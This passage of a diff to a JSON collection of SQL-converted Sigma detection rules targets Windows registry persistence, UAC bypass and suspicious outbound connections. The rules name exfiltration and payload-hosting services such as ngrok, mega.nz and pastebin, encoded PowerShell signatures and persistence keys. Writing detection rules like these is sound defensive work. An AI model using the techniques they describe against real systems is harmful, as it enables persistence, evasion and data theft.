'C:\\\\Windows\\\\system32\\\\LogonUI.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Authentication\\\\Credential Providers\\\\{BEC09223-B018-416D-A0AC-523971B639F5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\regsvr32.exe' ESCAPE '\\' AND TargetObject LIKE '%DropboxExt%' ESCAPE '\\' AND NewValue LIKE '%A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Opera Browser Assistant' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Opera\\\\assistant\\\\browser\\_assistant.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\iTunesHelper' ESCAPE '\\' AND NewValue LIKE '\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\"' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\zoommsirepair' ESCAPE '\\' AND NewValue LIKE '\"C:\\\\Program Files\\\\Zoom\\\\bin\\\\installer.exe\" /repair' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Greenshot' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Greenshot\\\\Greenshot.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\GoogleDriveFS' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\GoogleDriveFS.exe%' ESCAPE '\\') OR (TargetObject LIKE 
'%GoogleDrive%' ESCAPE '\\' AND NewValue IN ('{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}', '{A8E52322-8734-481D-A7E2-27B309EF8D56}', '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}', '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}')) OR ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \"C:\\\\Users\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\') AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{%' ESCAPE '\\' AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Package Cache\\\\{%' ESCAPE '\\' AND NewValue LIKE '%}\\\\python-%' ESCAPE '\\' AND NewValue LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND NewValue LIKE '%\\\\Microsoft\\\\Teams\\\\Update.exe --processStart %' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\userinit.exe' ESCAPE '\\' AND NewValue = 'ctfmon.exe /n') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\Setup\\\\%' ESCAPE '\\' AND (NewValue LIKE '\"C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR NewValue LIKE '\"C:\\\\Program Files (x86)\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR NewValue LIKE '{472083B0-C522-11CF-8763-00608CC02F24}' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND TargetObject LIKE 
'%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\aurora-dashboard' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Aurora-Agent\\\\tools\\\\aurora-dashboard.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Everything' ESCAPE '\\' AND NewValue LIKE '%\\\\Everything\\\\Everything.exe\" -startup' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" ], - "filename": "registry_set_asep_reg_keys_modification_currentversion.yml" + "filename": "net_connection_win_imewdbld.yml" }, { - "title": "UAC Bypass via Event Viewer - Registry Set", - "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", + "title": "Microsoft Sync Center Suspicious Network Connections", + "id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", "status": "experimental", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", + "author": "elhoim", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR 
DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\') AND DestinationIsIpv6 = 'false'))" ], - "filename": "registry_set_uac_bypass_eventvwr.yml" + "filename": "net_connection_win_susp_outbound_mobsync_connection.yml" }, { - "title": "Suspicious Service Installed", - "id": "f2485272-a156-4773-82d7-1d178bc4905b", + "title": "Microsoft Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", "status": "test", - "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1562.001", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ - "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." 
+ "Unknown", + "@subTee in your network" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\NalDrv\\\\ImagePath' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PROCEXP152\\\\ImagePath' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\') AND NewValue LIKE '%\\\\WINDOWS\\\\system32\\\\Drivers\\\\PROCEXP152.SYS%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE 'C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Temp\\\\%' ESCAPE '\\') AND (Initiated = 'true' AND (DestinationHostname LIKE '%.ghostbin.co' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE 
'\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\')))" ], - "filename": "registry_set_susp_service_installed.yml" + "filename": "net_connection_win_binary_susp_com.yml" }, { - "title": "Add Debugger Entry To AeDebug For Persistence", - "id": "092af964-4233-4373-b4ba-d86ea2890288", - "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Notepad Making Network Connection", + "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "status": "test", + "description": "Detects suspicious network connection by Notepad", + "author": "EagleEye Team", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.execution", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Legitimate use of the key to setup a debugger. 
Which is often the case on developers machines" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AeDebug\\\\Debugger%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\') AND NOT (NewValue LIKE '\"C:\\\\WINDOWS\\\\system32\\\\vsjitdebugger.exe\" -p \\%ld -e \\%ld -j 0x\\%p' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" ], - "filename": "registry_set_aedebug_persistence.yml" + "filename": "net_connection_win_notepad_network_connection.yml" }, { - "title": "CrashControl CrashDump Disabled", - "id": "2ff692c2-4594-41ec-8fcb-46587de769e0", - "status": "experimental", - "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Silenttrinity Stager Msbuild Activity", + "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "status": "test", + "description": "Detects a possible remote connections to Silenttrinity c2", + "author": "Kiran kumar s, oscd.community", "tags": [ - "attack.t1564", - "attack.t1112" + "attack.execution", + "attack.t1127.001" ], "falsepositives": [ - "Legitimate disabling of crashdumps" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" ], - "filename": 
"registry_set_crashdump_disabled.yml" + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" }, { - "title": "Registry Persistence via Explorer Run Key", - "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", - "status": "test", - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "author": "Florian Roth (Nextron Systems), oscd.community", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], + "title": "Suspicious Dropbox API Usage", + "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "status": "experimental", + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate use of the API with a tool that the author wasn't aware of" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((NewValue LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR NewValue LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\Dropbox%' ESCAPE '\\'))" ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml" + "filename": "net_connection_win_susp_dropbox_api.yml" }, { - "title": "Scripted Diagnostics Turn Off Check Enabled - 
Registry", - "id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", - "status": "experimental", - "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Dllhost Internet Connection", + "id": "cfed2f44-16df-4bf3-833a-79405198b277", + "status": "test", + "description": "Detects Dllhost that communicates with public IP addresses", + "author": "bartblaze", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218", + "attack.execution", + "attack.t1559.001" ], "falsepositives": [ - "Administrator actions" + "Communication to other corporate systems that use IP addresses from public address spaces" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\ScriptedDiagnostics\\\\TurnOffCheck' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE 
'172.31.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" ], - "filename": "registry_set_enabling_turnoffcheck.yml" + "filename": "net_connection_win_dllhost_net_connections.yml" }, { - "title": "Suspicious Environment Variable Has Been Registered", - "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", - "status": "test", - "description": "Detects the creation of user-specific or system-wide environment variables via the registry. 
Which contains suspicious commands and strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Communication To Ngrok.Io", + "id": "18249279-932f-45e2-b37a-8925f2597670", + "status": "experimental", + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok.io" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (NewValue IN ('powershell', 'pwsh') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR NewValue LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR NewValue LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%SW52b2tlL%' ESCAPE '\\' OR NewValue LIKE '%ludm9rZS%' ESCAPE '\\' OR NewValue LIKE '%JbnZva2Ut%' ESCAPE '\\' OR NewValue LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR NewValue LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR NewValue LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (NewValue LIKE 'SUVY%' ESCAPE '\\' OR NewValue LIKE 'SQBFAF%' ESCAPE '\\' OR NewValue LIKE 'SQBuAH%' ESCAPE '\\' OR NewValue LIKE 'cwBhA%' ESCAPE '\\' OR NewValue LIKE 'aWV4%' ESCAPE '\\' OR NewValue LIKE 'aQBlA%' ESCAPE '\\' OR NewValue LIKE 'R2V0%' ESCAPE '\\' OR NewValue LIKE 'dmFy%' ESCAPE '\\' OR NewValue LIKE 'dgBhA%' ESCAPE '\\' OR NewValue LIKE 'dXNpbm%' ESCAPE '\\' OR NewValue LIKE 'H4sIA%' ESCAPE '\\' OR NewValue LIKE 'Y21k%' 
ESCAPE '\\' OR NewValue LIKE 'cABhAH%' ESCAPE '\\' OR NewValue LIKE 'Qzpc%' ESCAPE '\\' OR NewValue LIKE 'Yzpc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" ], - "filename": "registry_set_suspicious_env_variables.yml" + "filename": "net_connection_win_ngrok_io.yml" }, { - "title": "Potential Registry Persistence Attempt Via Windows Telemetry", - "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "title": "Communication To Mega.nz", + "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "status": "test", - "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "author": "Lednyov Alexey, oscd.community, Sreeman", + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of mega.nz uploaders and tools" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (NewValue LIKE '%.sh%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR 
NewValue LIKE '%.bin%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.cmd%' ESCAPE '\\' OR NewValue LIKE '%.js%' ESCAPE '\\' OR NewValue LIKE '%.ps%' ESCAPE '\\' OR NewValue LIKE '%.vb%' ESCAPE '\\' OR NewValue LIKE '%.jar%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.msi%' ESCAPE '\\' OR NewValue LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((NewValue LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR NewValue LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" ], - "filename": "registry_set_telemetry_persistence.yml" + "filename": "net_connection_win_mega_nz.yml" }, { - "title": "Potential Persistence Via Scrobj.dll COM Hijacking", - "id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", - "status": "experimental", - "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", - "author": "frack113", + "title": "Regsvr32 Network Activity", + "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate use of the dll." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%InprocServer32\\\\(Default)' ESCAPE '\\' AND NewValue LIKE 'C:\\\\WINDOWS\\\\system32\\\\scrobj.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" ], - "filename": "registry_set_persistence_scrobj_dll.yml" + "filename": "net_connection_win_regsvr32_network_activity.yml" }, { - "title": "Registry Modification to Hidden File Extension", - "id": "5df86130-4e95-4a54-90f7-26541b40aec2", - "status": "test", - "description": "Hides the file extension through modification of the registry", - "author": "frack113", + "title": "Network Communication With Crypto Mining Pool", + "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "status": "stable", + "description": "Detects initiated network connections to crypto mining pools", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Administrative scripts" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)')))" + "SELECT * FROM logs WHERE DestinationHostname IN ('alimabi.cn', 'ap.luckpool.net', 'bcn.pool.minergate.com', 'bcn.vip.pool.minergate.com', 
